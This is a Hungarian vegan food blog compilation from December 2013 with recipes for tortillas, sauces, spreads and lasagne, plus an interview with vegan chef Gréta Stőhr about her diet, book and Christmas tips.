Ha ti is nehezen bírjátok a tél szürkeségét, akkor itt az ideje, hogy sokféle színben pompázó étel kerüljön a tányérra. Az egyik lehetőség, ez a könnyen elkészíthető, nagyon ízletes mexikói étel, ami egyszerre gyönyörködteti a szemünket és az ízlelőbimbóinkat. Eredeti változata a carnitas (apró húsdarabok), amit vegán változatában veggitasnak kereszteltem. Hús helyett vegán alapanyagokkal, ez esetben chilis babbal töltjük meg, de készíthető a carnitashoz hasonló szejtános verzió is.
Hozzávalók:
A chilis babhoz:
- 350g főtt vörös bab
- 250g főtt kukorica
- 5-6 ek paradicsompüré
- 1 tk őrölt kömény
- 1,5 tk őrölt koriander
- 1-2 gerezd fokhagyma (apróra vágva)
- 1db nagyobb vörös, vagy lila hagyma (felkockázva)
- ízlés szerint friss vagy szárított/őrölt chili
- 1db babérlevél
- 2 tk oregano
- 2 tk taco fűszerkeverék
- 2 ek szója, vagy tamari szósz
- 2 késhegynyi őrölt fahéj
- 1/2 kk őrölt fekete bors
- 1 tk édes pimentón (füstölt paprika)
- 2-3 evőkanál olívaolaj
- só
A veggitashoz:
- 6-8 db tortilla
- 1 db nagyobb avokádó (felszeletelve)
- 1db kápia, vagy kaliforniai paprika (apróbb kockákra vágva)
- 1-2 db paradicsom (felkockázva)
- 1/2 kígyó uborka (kicsi kockákra vágva)
- 1-2 db zöldpaprika (karikákra vágva)
- 4-5 db kínai kel levél, vagy más saláta anyag (csíkokra vágva)
- 1db citrom (megmosva, negyedelve)
Így készítsd el:
A hagymát és a fokhagymát enyhén pirítsd meg 2-3 kanál olajon, majd keverd hozzá a főtt babot és a főtt kukoricát.
Add hozzá a paradicsompürét és fűszereket, majd folyamatos kevergetés közben alacsonyabb lángon hagyd összefőni a fűszerekkel és tedd félre.
A betöltésre szánt tortilla lapok mindkét oldalát egy palacsintasütőben, vagy teflon serpenyőben olaj nélkül, pirítsd enyhén ropogósra.
A tortillákat töltsd meg a chilivel és a felaprított zöldségekkel, majd kicsit hajtsd össze, ahogyan a képen látható. Jót tesz neki, ha meglocsolod a tölteléket a tortilla mellé tálalt citromdarab levével, és máris mehet a gyomorba.
Fantázia tallérok
Férjem unokatestvére látogatott meg minket párjával nem régiben, akkor hoztam össze ezt a gyors, mutatós és laktatós finomságot. (Néhány tallér teljesen eltelít.) Nem vegánok készíthetik háztartási keksz ledarálásával, vegánok pedig darált zabpelyhet (vagy vegán kekszet) használhatnak alapnak. Szerintem osztály vagy munkahelyi karácsonyra is elkészíthető. Gondolom, most sokaknak aktuális.
A recept:
Hozzávalók:
1 adag darált keksz vagy zabpehely (pl. 1/4 kg)
víz
cikória vagy gabonakávé
karob- vagy kakaópor
növényi tejszín
édesítőszer (gyümölcscukor, xilit, méz, nyírfacukor, barnacukor - ki mit használ)
kókuszreszelék
Elkészítés:
Először is főzzünk, készítsünk kávét a gabonakávéból vagy cikóriából. Vannak instant kávék és forrázós eljárással készíthetők. Kinek milyen van. A megdarált zabpehelyre vagy kekszre szórjunk valamennyi (kb. 2-3 evőkanál) karobport (kakaóból kevesebb kell, de dolgozhatunk mindkettővel is). Édesítsük (ha háztartási keksszel dolgozunk, lehet, hogy elég édes így is), majd öntsük rá szép lassan a kávét. Közben keverve, figyelve, hogy mennyi folyadékot vesz fel a száraz alapanyag. Amikor az egész már összeáll és egy nagy gombócot tudunk belőle gyúrni, akkor kókuszos deszkán kinyújtjuk a tésztát és pogácsa szaggatóval korongokat szaggatunk. Tálcára tesszük őket. A tejszínt két részre osztjuk. Az egyikhez hozzáadunk egy kevés karobport vagy kakaóport. Először a fehér színűt verjük fel, majd a barna színűt. Ha nem édesített a tejszínünk, kicsit érdemes édesíteni. Tejszínhab-kinyomó "zsákba" tesszük a tejszínhabot. Ha ez nincs, fogunk két zacsit, a barna színű tejszínhabot az egyikbe, a fehéret a másikba töltjük úgy, hogy a zacsik egyik sarkába halmozzuk fel a habot. A zacsi sarkát a végénél ollóval levágjuk. Kezdődhet a díszítés saját ötleteink szerint. Hűvös helyen tároljuk, míg tálalásra kerül a sor.
Igazi vendégváró falat. Elkészíthetjük karácsonyra vagy akár farsangra is. Télen és nyáron is nagyon finom és ezzel egyedi világot kölcsönözhetünk a sokak által ismert és megszokott "keksztekercsnek".
Miattam ne szenvedjen egy állat sem! - interjú Stőhr Grétával
2013. december 11. La Veganista
Blogom vendége ezúttal, Stőhr Gréta vegán séf, életmód tanácsadó, gasztroblogger, a Gréta konyhája című könyv írója és a szintén Gréta konyhája néven futó televíziós műsor szerkesztő-háziasszonya. Arra kértem, hogy ossza meg velünk tapasztalatait, mesterfogásait, és adjon néhány praktikus tanácsot a karácsonyi időszakra.
La V.: Amikor az interjú elkészítéséhez információkat gyűjtöttem rólad és a munkásságodról, rögtön felkeltette a figyelmem az, hogy vegetáriánus családban nőttél fel. Nem noszogattak azzal, hogy egyél még egy falat pipicombot, mert attól nősz nagyra? Miért lettek vegetáriánusok a szüleid? Honnan tudták, hogy hús nélkül is egészségesen cseperedsz fel?
Gréta: Édesanyám egy komoly autoimmun betegség miatt kényszerűségből hagyta abba a húsevést, még gyerekkoromban. Édesapám csak később, vallási okok miatt lett vegetáriánus, de anyukám attól függetlenül elkészítette nekünk a húsos ételeket, bár én sosem szerettem igazán. Tömni nem tömtek, de abban az időben édesanyám sem tudott sokat a gyermekkori húsevésről, vagy annak hiányáról, így 2 évnél tovább nem tudtam vegetáriánus maradni. Tizenkét éves koromban, valahogy összeállt a fejemben, hogy az asztalomon lévő hús ártatlan, élni akaró, érző állatok tetemeiből való, és nem voltam hajlandó megenni. Ez körülbelül két évig tartott, azután a háziorvosunk megfélemlítő szigorú tanácsára, miszerint, ha nem eszem húst sosem leszek normális felnőtt, elkezdtem újra húst enni. Szóval abban az időben, ez hatalmas bűn volt egy anya részéréről, hogy nem adott húst a gyermekének. Pedig én mindig azt szerettem volna enni, amit anya evett. Már akkor belekóstoltam a változatos vegetáriánus-reform konyha világába, és nagyon megkedveltem.
La V.: Mi ösztönzött arra, hogy három és fél évvel ezelőtt végleg felhagyj a vegetáriánus koszttal és áttérj a kizárólag növényi alapú élelmiszerek fogyasztására?
Gréta: Nekem egyszer csak megvilágosodott minden. Tényleg minden pillér, szinte ugyanakkor épült fel bennem. Összehozott a sors az interneten csodásan szép, egészségtől kicsattanó nem öregedő vegán atlétákkal, és azt mondtam magamban:- Akarom a titkukat. A fiatalság forrását akarom. A másik, hogy ezzel egyidőben megnéztem az Earthlings (Földlakók) című filmet. Illetve az első 20 percét. Olyan mély szomorúságot éreztem, hogy eldöntöttem, nem akarok ennek a részese lenni. Miattam ne szenvedjen egy állat sem. Ahogy korábban is mondtam, nekem egyszer már gyermekkoromban összeállt a kép, és akkor megint megtörtént. Elkezdtem követni vegán embereket, recepteket, kihagytam az ételeimből a tejterméket tojást (mert akkor már 4-5 éve újra vegetáriánus voltam). Sorra jöttek a cikkek, miszerint a húsevés, ipari tejtermelés tojástermelés borzasztóan környezetszennyező, és még a világméretű éhezés is ennek a számlájára írható. Világossá vált számomra, mit is teszünk a lakóhelyünkkel, állatbarátainkkal, önmagunkkal. Én elmondhatom, hogy egyszerre lettem etikai-, spirituális-, egészségügyi-, és ökovegán. A testem-lelkem minden sejtje érzi, hogy ez a helyes Út!
La V.: Egy helyen írtad, hogy az áttérés fizikai, lelki és szellemi értelemben is változásokat hozott. Konkrétan mit tapasztaltál?
Gréta: Egész gyermekkoromban végigkísért egy makacs, krónikus arcüreggyulladás, és nem volt olyan év, hogy legalább kétszer ne szenvedjek tőle. Már mindent kipróbáltam, de megdöbbenve tapasztaltam, hogy abban az évben, mikor vegán lettem, nem volt ilyen panaszom. Sem télen, sem nyáron. A felső légúti megbetegedéseim gyógyulási aránya pedig 2-3 hétről, 2-3 napra redukálódtak. A másik, hogy a szülés után rajtam maradt felesleg, amit már sehogyan nem tudtam ledolgozni, egyszerűen 3-4 hónap után eltűnt, a kilók leolvadtak rólam. Nem is sejtjük, hogy az egészségesnek kikiáltott tejtermékek, mennyi rejtett zsírt, és cukrot tartalmaznak. A testünknek egyáltalán nincs szüksége erre. Testi értelemben nem öregszem, úgy érzem, visszafelé forog az idő. 25 éves koromban nem éreztem ilyen fittnek, tisztának, és energikusnak magam. A testem tisztulása mellett tudatom is tisztult, sokkal nyitottabb lettem. Érzem az embereket, intuícióm szinte tökélyre fejlődött, boldogabb, elégedettebb ember vagyok, akit az élet a tenyerén hordoz. De azt is megértettem, hogy ez egy belső döntés. Hiszem, hogy táplálkozásunk nagyban befolyásolja érzelmi és szellemi fejlődésünket. Ha életet eszem, magam is élek.
La V.: Több évet töltöttél külföldön. Erről az időszakról úgy nyilatkozol, hogy az ott szerzett gasztronómiai tapasztalatok áthatják, inspirálják a konyhádat. Mely kultúrák kulináris élményei voltak a legmeghatározóbbak, hogyan jelennek meg a receptjeidben?
Gréta: Mindegyik! Kivéve a lengyel konyhát, pedig Varsóban is éltem 5 évet. Ha most megkérdeznéd mi a kedvenc ételem, akkor egyértelműen azt mondanám: a vegán SUSHI!!!! De imádom az olasz konyhát, a koreait, a mexikóit, franciát, indiait és ezek gyakran visszaköszönnek a receptjeimben. Minden nemzetnek vannak isteni vegán, vagy kis kreativitással vegánosítható, egészséges fogásai. Például a guacamole, na azt, mindennap tudnám enni. Ha elmész egy magyar étterembe, a legtöbb helyen ugyanazt kapod. Ezen változtatni kell! Az embereknek tudniuk kell, hogy az olasz konyha nem merül ki a pizzában, mint ahogy a kínai sem, az édes-savanyú fogásokban. Fantasztikus élmény látni az embereket ahogy először megkóstolnak valamit, amit azelőtt még soha nem ettek. Látni az arcukon az örömöt, szemükben a fényt. Én elhozom a világ konyháit. A Vegán világét.
La V.: Gasztroblogod elindítását az motiválta, hogy a kisfiadnak készített vegetáriánus ételek receptjeit másokkal is megoszd. Azóta vegán lettél, átalakultak a receptjeid. Ezek szerint a gyermeked is a vegán étrendet követi? Mit tanácsolsz a vegán gyerekek szüleinek, mire figyeljenek oda?
Gréta: A kisfiam nem teljesen vegán (bár ő annak vallja magát), mert házon kívül is eszik. Óvodás. Ott tiszteletben tartják, hogy vegetáriánus, de nem kap külön vegetáriánus menüt, hanem azt eszi, amit a többiek, kivéve a húst. Ez itthon még katasztrofálisan gyerekcipőben jár. Ha valaki vegetáriánus gyermeket nevel, akkor eleve változatosabban főz, mint a húsevők. Mi sokkal több zöldséget használunk fel különböző módon. Figyelnünk kell arra, hogy sok nyers zöldség-gyümölcs legyen az alapja, a gyermek, napi étrendjének. Hetente fogyasszon legalább kétszer hüvelyest (bab, borsó, lencse, csicseriborsó), gabonák közül az édesen és sósan is elkészíthető rizst, kölest, quinoát. Ismertessük meg velük az édesburgonyát, tökféléket, avokádót. Ne tejes-cukros-zsíros egészségtelen édességet adjunk a gyermeknek, hanem készítsük együtt a finomságokat, például a banán-avokádó-kakakópudingot. Ismertessük meg velük a sokféle változatokban kapható nagyon finom, és könnyű növényi tejeket. Nassoljanak aszalt gyümölcsöket, sózatlan pörköletlen magvakat. Csíráztassunk velük együtt, és a teljes kiőrlésű kenyerekre tegyük csírákat feltétként, így megláthatják, hogy egy kis napfény, sötétség, és víz, milyen csodára képes.
La V.: Ma még nem jellemző, hogy a vegán ételek népszerűek lennének idehaza, mégis sikerült bebizonyítanod, hogy helyük van a magyar gasztro-palettán. Önálló főzőműsorod van, internetes életmód magazinban jelennek meg a receptjeid. Hogyan sikerült elérned?
Gréta: Hittel. Töretlen hittel, és kitartó munkával. Amikor rájöttem, hogy ez az életmód milyen csodálatos, azt éreztem, ezt azonnal el kell mondanom. Mindenkinek! Ahol csak tudtam beszéltem róla. Indítottam Facebook oldalt, blogot, weboldalt, később You Tube csatornát, még varsói otthonomban drága magyar barátnőm segítségével készítettük az első receptes videókat. Töretlenül informáltam és informálódtam. Ez a mai napig így megy. Bátor voltam, és sok mindent fel kellett adnom ahhoz, hogy ma itt lehessek. Nincsenek befolyásos ismeretségeim, média kapcsolataim. Egy nő vagyok, aki rájött valamire, és ezt szeretné megosztani másokkal is. A motivációm, a szeretet. Semmi másban nem hiszek csak abban, hogy ha van egy célod, amit a szeretet motivál, akkor bármit elérhetsz. Csak ne add fel. Soha!
La V.: Ez év márciusában jelent meg első könyved Gréta konyhája címmel. Százötven vegán recept mellett életvezetési tanácsokat is tartalmaz. Miért tartottad fontosnak, hogy ne csak szakácskönyvet adj az érdeklődők kezébe?
Gréta: Egyszerűen azért tartottam fontosnak, hogy ne csak pusztán szakácskönyv legyen, mert amikor én a vegánság útjára léptem, hálás lettem volna egy ilyen könyvért, amely kézzel fogható hasznos tanácsokat ad nekem amellett, hogy számos ötletet is kapok, hogyan lehet gyorsan, erőszakmentesen finom, és egészséges ételt varázsolni az asztalunkra. Tudatni akartam azt is, hogy a vegánság nem egy diéta, egy divat, vagy egy hóbort, ahogy sokan hiszik, hanem egy komplex, és varázslatos életforma, amellyel nemcsak önmagunkhoz, hanem másokhoz is visszatalálhatunk. A boldogság, és egészség kulcsa nem csak az, hogy mit eszel, és mennyi értéket halmozol fel, hanem abban rejlik, hogy te mennyit tudsz adni. Szerettem volna, ha az olvasók megértik, hogyan, milyen motívumok mentén válik, válhat valaki növényevővé, és ha a változás útjára lép, hogyan tud rajta maradni.
La V.: Engem meggyőztél, most már csak az a kérdés, hogy ha rendelek egy példányt, akkor kaphatok bele dedikálást, hogy személyesebb legyen?
Gréta: Természetesen. Mindenki személyre szóló dedikált példányt kap, aki megrendeli.
La V.: Legyél most néhány kérdés erejéig a személyes tanácsadóm. Tegyük fel, hogy eddig vegyes étrenden éltem, de elhatároztam, hogy teljesen felhagyok az állati eredetű ételek fogyasztásával. Üresnek érzem a bevásárló kosaramat, mert kikerültek belőle az állati eredetű élelmiszerek. Milyen alapanyagok kerüljenek a bevásárlólistámra? Egyáltalán milyen zöldségeket, gyümölcsöket vásárolhatok télen?
Gréta: A könyvben az olvasó, bevásárló listával is találkozhat. A lényeg, hogy táplálkozása legalább 50%-a nyers, szezonális gyümölcs-zöldség-zöld leveles növény legyen. A hűtőmbe, spájzba benézve mondom most, legyen otthon mindig növényi tej, tejszín, joghurt, mert ezekkel változatos édességeket, habarásokat, pudingokat, saláta önteteket lehet készíteni. Szójából a fermentáltat részesítse előnyben, ilyen a szójaszósz, a tofu. Cukorból és lisztből száműzze a fehéret. Gabonákból komplexitásuk, és tökéletes húspótló hatásuk miatt a kölest, a hajdinát, a quinoát és a barna rizst együk. Mindig legyen otthon búzasikér, amelyből ízletes szejtánt (búzahúst) tudunk készíteni olcsón, házilag. Legyen otthon dió, mogyoró, aszalt gyümölcsök, egy-két csomag durum tészta, és a tojást kiválóan helyettesítő csicseriborsó, vagy bármilyen hüvelyesből készült liszt. Ínyencek és korábbi húsfüggők beszerezhetnek maguknak változatos gabonakolbászokat, növényi virsliket, pástétomokat és növényi pecsenyezsírt is. De ha nálam van otthon avokádó, én már boldog vagyok. Télen fogyasszunk sok almát, céklát, kel-, sima-, és savanyú káposztát, édesburgonyát, sütőtököt, karalábét és gyökérzöldségeket, melegítő fűszereket, chilit, gyömbért, fahéjat, és melegítő gabonákat, kölest, hajdinát, vagy zabot.
La V.: Itt van előttem egy halom vegán alapanyag. Milyen konyhai eszközökkel tudom megkönnyíteni a feldolgozásukat?
Gréta: Egy turmixgép mindenképpen ajánlott, nagyobb beruházásra nem lesz szükség. Érdemes olyat választani, amihez van aprító is. Gépek közül sokat használom a botmixert, a kávédarálót, és kell egy nagyon jó minőségű tapadásmentes serpenyő. Nem árt, ha van egy éles kés, egy jó hámozó, és egy wok is nagyon hasznos lehet.
La V.: A neten vegán gasztroblogokat olvasok, nézem a főzővideókat, de egy vidéki kisvárosban élek, van esélyem beszerezni az olyan alapanyagokat, mint például a növényi tejek, sajtok, joghurt, tejföl, szejtán vagy az én konyhámban elmarad a vegán forradalom?
Gréta: Nyíregyházán élek, az is vidéki kisváros. Sok főzőtanfolyamot tartottam már kisebb vidéki városokban is, és soha nem volt gond beszerezni az alapanyagokat. Igaz néha ,,vadászni kell a jó akciókat, de megéri. Talán eleinte több időt vesz igénybe a dolgok felkutatása, de ha egyszer megvannak, akkor célirányosan kell vásárolni. Mi a helyi Kosárközösségből vásároljuk a gyümölcsöt-zöldséget. A tejtermék és húspótlókat, pedig nagyáruházakban szerezzük be, amelyek minden kisvárosban vannak. Ezek közül szinte mindnek van bio részlege. Annak aki vegánná válik, azt tanácsolom, hogy csatlakozzon közösségi oldalakhoz, fórumokhoz, ha elakadna, ezeken a platformokon, sok lelkes segítőre lelhet.
La V.: Szeretnék fincsi vegán sütiket készíteni, de fogalmam sincs hogyan pótoljam a hagyományos receptekben lévő tojást. Vannak erre bevált ötleteid?
Gréta: A könyvben külön részleget szenteltem ennek a témának, de nem fért minden bele, ezért az ingyenes letölthető e-bookba került, ahol sok-sok más tipp és ötlet található. A leghasznosabb tanács, mit adhatok, hogy egyszerűen hagyd ki a süteményből a tojást. De ha mégis kipróbálnád a tojáspótlást, íme, néhány hasznosság: kötőanyagként térfogatnövelőként fasírtokba, vagdaltakba, töltelékekbe használhatsz csicseriborsólisztet, sárgaborsólisztet, őrölt lenmagot vízzel elkeverve, kukoricalisztet, étkezési keményítőt, bio zabpelyhet (finomra őröltet), élelmiszer allergia szaküzletekben készen kapható tojáspótló port is találsz, amit a leírás szerint kell elkészíteni. Panírozás esetén 2-3 evőkanál kukoricakeményítő és 6-7 kanál szójatej pici sóval összeturmixolva, tökéletesen helyettesíti a tojást. Sütéshez (térfogatnövelésre) a süteményekbe annyi evőkanál almaecetet keverj, amennyi tojás kellene bele. Egy egész tojást pótol 1 evőkanál őrölt lenmag, 3 evőkanál forró vízzel elkeverve, vagy 2 evőkanál víz, 1 evőkanál olaj, 2 teáskanál sütőpor összekeverve. Egy tojásfehérje helyettesítéséhez elegendő 1 evőkanál ízesítetlen agar-agar, 1 evőkanál vízbe feloldva, felverve, lehűtve, majd újra felverve. További tojáspótló anyagok az útifűmaghéj, valamint a banán összetörve. Lepényekhez, rántottába használj tofut, vagy selyemtofut (1 tojás, kb. 3 dkg tofu, vagy 3 dkg selyemtofu, összeturmixolva), és csicseriborsólisztet.
La V.: Közeleg a karácsony, hazautazok a szülői házba, ahol az ünnepi asztal jó eséllyel a hagyományos húsos ételektől roskadozik majd. Hogyan hidalhatom át a szakadékot, ami a család ékezési szokásai és a személyes meggyőződésem között van?
Gréta: Úgy, hogy felajánlod, idén te készíted az ünnepi menüt.
La V.: Tudnál valami igazán klassz, gyorsan elkészíthető vegán karácsonyi ételt ajánlani, amivel megkínálhatom a családomat?
Gréta: Imádom az édesburgonyát, mindenféle formátumban készítettem már, de csak nemrég fedeztem fel az alábbi receptet, amely tökéletesen helyettesítheti az egészségtelen hagyományos-majonézes krumplisalátát. Gyors, és isteni!
Édesburgonya saláta pisztáciával, hozzávalók:
- 4 db friss édesburgonya meghámozva, felkockázva
- 1 szál újhagyma, vagy póréhagyma, apróra vágva
- 1 csokor friss petrezselyem apróra vágva
- 1,5 dl szójajoghurt
- 1 1 tk dijon mustár
- 1 ek rizsszirup
- 1/2 citrom leve
- só, bors, vegamix
- olívaolaj
- 10 dkg pisztácia
A sütőt előmelegítjük 180 fokra, egy tepsit kibélelünk sütőpapírral, és eloszlatjuk rajta a kockákra vágott édesburgonyát. Meglocsoljuk olívaolajjal, és megszórjuk vegamix-szel. 25 perc alatt készre sütjük, majd hagyjuk kihűlni.
Ezalatt egy tálba rakjuk az öntet hozzávalóit, jól összekeverjük, majd beleszórjuk a hagymát és a petrezselymet. Ha az édesburgonya kihűlt, hozzáadjuk az öntethez és alaposan összeforgatjuk.
Tálalás után tetejét megszórjuk pisztáciával, de adhatunk hozzá aszalt áfonyát is, nagyon jól harmonizál.
La V.: Van lehetőségem arra, hogy megtanuljam az alapfogásokat nálad egy főzőtanfolyam keretében, vagy esetleg többet is megtudjak a vegán életmódról egy előadáson?
Gréta: Mostanában házi főzőtanfolyamokat tartok, 6-8 ember, általában barátok összejönnek, és együtt főzünk, ez mindig más konyhájában történik, egyelőre keressük az állandó helyet. Ha valaki követi a Facebook oldalamat, akkor minden információt megtalál, mikor és hol mit tartok. Vannak nagyobb városi rendezvények, televíziós műsorok, előadások, és tervben van egy ételkiszállítás is, nagyon rövid időn belül. Szeretem a személyes kapcsolatot, de ha valakinek kérdése van, e-mailen is elér (gretakonyhaja@postr.hu, info@gretastohr.com), igyekszem válaszolni.
La V.: Arról nem beszéltünk még, hogy milyen terveid vannak a jövőt illetően, illetve milyen további fórumokon követhetjük a veled kapcsolatos eseményeket?
Gréta: Terveimben szerepel egyelőre ételkiszállítás, és catering, kicsit távolabbi célom, pedig egy étterem, illetve később egy étteremlánc. A Lifenetwork adón jelenleg napi hat alkalommal mindenki megtekintheti az 5 perces minivideóimat, amelyek reményeim szerint tovább bővülnek majd, illetve fix helyet, és hosszabb műsoridőt kaphatnak a csatornán. A Facebookon mindenki megtalál, és kedve szerint követheti a velem kapcsolatos eseményeket, illetve napi recept és életmódtippeket, hasznos cikkeket, és videókat találhat. A life.hu vegán életmód szakértőjeként, pedig országosan is megismerhetik receptjeimet, szemléletmódomat, és ott is lehetőségük van az olvasóknak velem kapcsolatba lépni, illetve kérdéseiket feltenni. Végső célom pedig egy boldog és erőszakmentes világ alapjainak, szemléletének úttörőjévé és példaképévé válni, ahol mindenki szabadon, és félelem nélkül megélheti azt, amiért valóban erre a világra született.
La V.: Kedves Gréta, sok hasznos információt, és tippet adtál mindannyiunknak. Köszönöm az interjút!
Gréta: Én köszönöm!
Édes-savanyú mártás - házilag
2013. december 7. Mindennapi ételeink
Sokkal finomabb és egészségesebb, illetve olcsóbb is mint a bolti mártás. Onnan jött az ötlet, hogy elkészítem, hogy kaptunk egy üveggel, és azt szerettem volna rekonstruálni, erre jutottam: Hozzávalók: 1 fej hagyma 2 gerezd fokhagyma 1 db piros színű paprika 1 db piros színű paprika 3 közepes sárgarépa 1 kisebb zellergumó 2 dl paradicsompüré himalaya só- igény szerint barna cukor - igény szerint 1 tk. ételízesítő mix 1 tk. folyékony fűszer 2 ek. kukoricakeményítő 1-2 tk. citromlé 3-4 ek. házi ketchup -- bulgur /barna rizs Elkészítés: Az apróra vágott hagymát kevés olaj és víz keverékén megpároljuk, majd hozzáadjuk a gyufaszálra szelt sárgarépát, a kis kockára aprított zellert, fokhagymát és paprikát. 1-2 percig pároljuk, majd hozzáadjuk a paradicsompürét, és felöntjük 2-3 dl ételízesítővel felforralt vízzel, sózzuk, folyékony fűszerrel és ételízesítő mix-szel ízesítjük illetve a 3-4 ek. vízben kikevert kukoricakeményítőt is ekkor adjuk hozzá. Ezután cukorral, citromlével (házi ) ketchuppal is ízesítjük, és készre főzzük. TIPP: Tálaljuk rizs helyett bulgurral - még különlegesebb lesz :-)
Rendelhető nyers édességek karácsonyra!
2013. december 6. Nyersétel akadémia
Szeretnénk segíteni abban, hogy a nagy ünnepi készülődést kicsit megkönnyítsük, s benne a Te munkádat is, hogy pihenésre is maradjon időd a nagy év végi sütés-főzés szezonjában. Ezért mi a Nyersétel Akadémián elhatároztuk, hogy készítünk sok-sok finom egészséges sütit, tortát - például ezt az isteni zserbót-, sós és édes ropogtatnivalót, amit meg tudsz előre rendelni és az ünnepek alatt csak eszegetni kell! NEM HIZLAL, ÉS FINOM!
A rendelhető finomságok listája, pontos árak és a rendeléssel, átvétellel kapcsolatos információkat itt találod: http://nyersetelakademia.wix.com/nyersetelakademia
Kakukkfüves /fokhagymás/ édesburgonya
Na, ez sem recept, inkább emlékeztető, ha később visszanézem. Ábel miatt mindenfélét próbálgatok, úgyis állandóan azt akarja enni, amit mi, gondoltam ez esetben mi igazodunk. (Na jó, a hétvégi rakott káposztával nem, arra mindenki csurgatja a nyálát erősen, de azt úgyis Anyu csinálta.) Vettem hát édesburgonyát a szokásos kofánál a piacon. (Nyolcvan-egynéhány éves, de legtöbbször az ötven-egynéhány éves vejét a férjének nézik.) Megtisztítottam, 1 ek olajon 25 pedig sütöttem az Actifry-ban (sütőben hőlégkeverésen kb. fél óra lehet 180 C-on) és a végén megszórtam kevés kakukkfűvel, némi sóval. Egy másik változatban apróra vágott fokhagymát is adtam hozzá pár perccel kikapcsolás előtt. A kis mazsolának nagyon ízlett, bár ő úgy kapta, hogy a közepéből kinyomogattam a puhább részeket, és enyém volt a "ropogója". Különböző fasírtok mellé köretnek jó alternatíva.
Tahinis padlizsánkrém
2013. december 1. Mindennapi ételeink
Azaz Baba ganoush, közkedvelt libanoni pástétom, nagyon zamatos, érdemes kipróbálni, hiszen így a megszokott lecsós padlizsánpástétom, vagy majonézes-füstölt padlizsános pástétom mellett új ízű pástétomot kóstolhatunk meg. Hozzávalók: 1 nagyobb padlizsán 2-3 ek. olívaolaj 1 nagy fej vöröshagyma 3-4 gerezd fokhagyma 2-3tk. római kömény 1 csipet barna nádcukor 6 ek. tahini (10 dkg szezámmag, 2 gerezd fokhagyma, 1 tk. himalaya só, 2-3 ek. olívaolaj, kb. 0,5 dl víz, 2 tk. citromlé) 1 nagy marék menta vagy petrezselyem, vagy korianderzöld 1 tk. citromlé Elkészítés: A padlizsánt félbevágjuk és olajjal kikent tepsiben meggrillezzük, vagy sütjük. A hagymát felaprítjuk és 1 ek. víz és ugyanannyi olaj keverékén megpároljuk. hozzáadjuk az áttört fokhagymát, és a tepsiből kivett, és héjából egy kanál segítségével kikapart padlizsánt. Citromlével, cukorral, római köménnyel és a megadott zöldfűszerek egyikével ízesítjük, majd hozzáadjuk az előzetesen elkészített tahinit. Amennyiben szükséges, utóízesítjük. A tahinit így tudjuk elkészíteni: a szezámmagot zsiradék nélküli edényben vagy serpenyőben megpirítjuk, majd kávédarálón alaposan összeőröljük. Hozzáadjuk az olajat, a víz felét, a fokhagymát, sót és a citromlevet. Egy botmixer segítségével alaposan összedaráljuk. A maradék vizet fokozatosan adagoljuk hozzá, amíg krémes állagú nem lesz. TIPP: A tahini nagyon finom édesen is, ez esetben fokhagymát és sót ne tegyünk bele, hanem 2 ek. mézzel ízesítsük.
Spenótos-sütőtökös lasagne
Nagyobb vendégség esetén nem árt kiadós ételekkel készülni, amik könnyen jóllakatják a társaságot...:)) A 'lasagne' kiváló megoldás ilyen esetekre! Sőt olyankor is, ha nekünk kell valamit vinni vendégségbe, mert könnyen is szállítható.:) Ez a verzió nagyon finom lett szerintem, gyorsan el is fogyott! A vegán besamel mártás egyik legnagyobb titka viszont a sok év tapasztalatai alapján, hogy egyetlen fajta növényi tejjel, azaz CUKROZATLAN, NATÚR (!) szójatejjel sikeredik csak igazán. Minden másfajta verzió esetén túl édeskés lesz a kész mártás....:/ Ja, és ez is azon vegán részletek egyike, amit fehér liszttel készítek, mert a teljes kiőrlésűvel nagyon nem jött be.... A spenót és a sütőtök pedig nagyon jól passzol egymáshoz!;) Korábban is szerepelt már egy másik karácsonyi SÜTŐTÖKÖS LASAGNE itt a blogon! Spenótos-sütőtökös lasagne Előkészítési idő 25 perc + kb. 2 óra sütés Hozzávalók (4-5 főre): 750 g sütőtök meghámozva, kimagozva, 1 cm-es kockákra vágva 2 ek. olívaolaj 500 g friss leveles spenót/ vagy fagyasztott leveles 1 ek. olívaolaj szerecsendió 12 db tojásmentes lasagne lap A paradicsomszószhoz: 1 közepes vöröshagyma, felaprítva 1 ek. olívaolaj 2 gerezd fokhagyma, felaprítva 400 g-os konzerv paradicsom (darabolt) 2 tk. agave szirup A vegán / tejmentes besamel mártáshoz: 500 ml cukrozatlan, natúr szójatej 50 g bio fehér liszt 50 g olívaolaj 1 babérlevél Melegítsük elő a sütőt 200 fokra. A felkockázott sütőtököt terítsük el egy tepsin, locsoljuk meg az olívaolajjal, sózzuk-borsozzuk és süssük kb. 40 percig. Közben készítsük el a paradicsomszószt: egy lábasban pirítsuk a hagymát az olajon kb. 5 percig, adjuk hozzá a fokhagymát, és főzzük még egy 1 percig. Tegyük bele a paradicsomot és az agave szirupot, és időnként megkeverve, fedő nélkül rotyogtassuk kb. 30 percig, amíg sűrű püré lesz. Sózzuk- borsozzuk ízlés szerint. A spenótot tegyük egy lábasba és kezdjük megpárolni közepes tűzön, kb. 4 percig. Hagyjuk kihűlni és nyomkodjuk ki belőle a felesleges vizet. Aprítsuk fel, és egy ek. olajon pároljuk tovább, majd ízesítsük sóval-borssal és egy kis őrölt szerecsendióval. A besamelmártáshoz forraljuk fel a tejet a babérlevéllel, és tegyük félre 5 percre. Adjuk hozzá a lisztet és az olajat, és közepesen tűzön keverjük, amíg sűrű mártást nem kapunk. Melegítsük elő ismét a sütőt 200 fokra. és állítsuk össze a lasagnet. Olajozzunk ki egy kb. 1,5 literes kerámia sütőformát és tegyük le először egy sor sütőtököt, rá egy réteg paradicsomszószt, utána 6 lasagne lapot, majd egy adag besamelmártást, és utána spenótot. Ismét lasagne lapok következnek, sütőtök, paradicsomszósz, megint lasagne lapok és besamelmártással fejezzük be. Toljuk be a sütőbe kb. 40 percre, vagy amíg kicsit barnulni kezd. Alapötlet (amit vegánosítottam): Good Food - Vegetarian Christmas
Diós sütőtökkel töltött padlizsán
